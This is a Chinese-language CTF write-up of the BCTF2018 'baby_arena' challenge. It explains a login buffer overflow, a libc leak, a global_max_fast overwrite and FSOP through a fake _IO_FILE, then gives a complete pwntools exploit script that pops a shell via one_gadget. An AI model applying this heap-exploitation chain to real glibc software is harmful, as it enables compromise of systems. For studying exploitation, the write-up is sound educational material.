BCTF2018 baby_arena

0.135字数 432阅读 176

漏洞位置

login函数中v3变量大小只有8,输入了0x10造成了溢出,溢出到v4造成了任意地址写,不过只能写成admin或者clientele

login

漏洞利用

首先有个alloc_check函数限制了申请的堆大小在0x960x176F之间,也就是在fastbin之外。

alloc_check
delete函数中,free后的空间没有清空。
delete
由此结合后面的view函数可leaklibc基址,并且获得global_max_fast的地址。然后触发login中的任意地址写,将clientele写到global_max_fast的地址,可以将fastbin的最大值改成特别大,最后算好偏移,将一个很大的构造好可以触发FSOPfake_file freeIO_list_all的地方,最后在exit时触发FSOP执行one_gadgetshell

  • global_max_fastmain_arena中控制最大fastbin大小的变量。
  • fastbin在根据大小不同,分别链到main_arena中的fastbinY数组中,数组大小为10,若修改global_max_fast之后,更大的fastbin将会根据偏移来计算链到的位置,而超出原本fastbinY规定的位置,到达bins甚至更后面的File结构体。
  • FSOP贴个链接吧,大概就是当程序在干下列事情之一时:
    1.libc执行abort流程时
    2.当执行exit函数时
    3.当执行流从main函数返回时
    会调用_IO_flush_all_lockp函数,在调用次函数时,当满足以下条件时:
    1._IO_FILE -> _mode <= 0
    2._IO_FILE -> _IO_write_ptr > _IO_FILE -> _IO_write_base
    又会执行_IO_OVERFLOW(_IO_FILE_plus , EOF)函数,其中提到的我们劫持_IO_list_all的指针后(_IO_list_all中存放了_IO_FILE的值),下面的_mode_IO_write_ptr_IO_write_base皆是该结构体上的变量,其中_IO_OVERFLOW函数,是存在于_IO_FILE_plus.vtable上偏移为0x18的函数指针,_IO_FILE_plus.vtable也是在该结构提上的指针。以上变量自己按着偏移去构造就行了。值得注意的是,当通过chunk劫持了_IO_list_all的指针后,由于指针指的是堆快的首地址,所以算偏移时需要减去堆头的大小。

my-exp.py

from pwn import *
local = 1
one_gadget = [0x45216 , 0x4526a , 0xf02a4 , 0xf1147]
if local:
    p = process('./baby_arena')
    libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
else:
    print 'time is up;'

def create(size , note):
    p.recvuntil('exit\n')
    p.sendline('1')
    p.recvuntil('size\n')
    p.sendline(str(size))
    p.recvuntil('note\n')
    p.sendline(note)
    p.recvuntil('is\n')
    note_is = p.recvuntil('\n')[:-1]
    p.recvuntil('successed\n')
    return note_is

def delete(id):
    p.recvuntil('exit\n')
    p.sendline('2')
    p.recvuntil('id:\n')
    p.sendline(str(id))
    p.recvuntil('order!\n')

def login(name , is_admin):
    p.recvuntil('exit\n')
    p.sendline('3')
    p.recvuntil('name\n')
    p.sendline(name)
    p.recvuntil('admin\n')
    p.sendline(str(is_admin))

def debug():
    print pidof(p)[0]
    raw_input()

#make fake_file to trigger FSOP
fake_file = 'a' * (0x20 - 0x10)     #padding
fake_file += p64(0)                 #write_base => offset_0x20
fake_file += p64(1)                 #write_ptr  => offset_0x28
fake_file += 'b' * (0xb8 - 0x28)    #padding
fake_file += p64(0)                 #mode       => offset_0xc0
fake_file += 'c' * (0xd0 - 0xc0)    #padding
fake_file += p64(0x6020b0 - 0x18)   #vtable     => offset_0xd8

#leak libc_base and get some important addr
create(0xa0 , '1' * 0xa0)           #0
create(0xa0 , '2' * 0xa0)           #1
create(0x1400 , fake_file)          #2  free to fastbin and overwrite IO_list_all
delete(0)
leak = create(0xa0 , '3' * 8)
libc.address = u64(leak[8:].ljust(8 , '\x00')) - 0x3c4b78
global_max_fast_addr = libc.address + 0x3c67f8
IO_list_all_addr = libc.symbols['_IO_list_all']
success('libc_base => ' + hex(libc.address))
success('global_max_fast => ' + hex(global_max_fast_addr))
success('IO_list_all => ' + hex(IO_list_all_addr))

#overwrite global_mas_fast and free chunk2 to overwrite IO_list_all to fake_file 
login(p64(libc.address + one_gadget[1]) + p64(global_max_fast_addr - 8) , 0)
p.recvuntil('wrong choice\n')
delete(2)
#debug()

#exit() and exec one_gadget to get shell
p.recv(1024)
p.sendline('4')
p.interactive()

推荐阅读更多精彩内容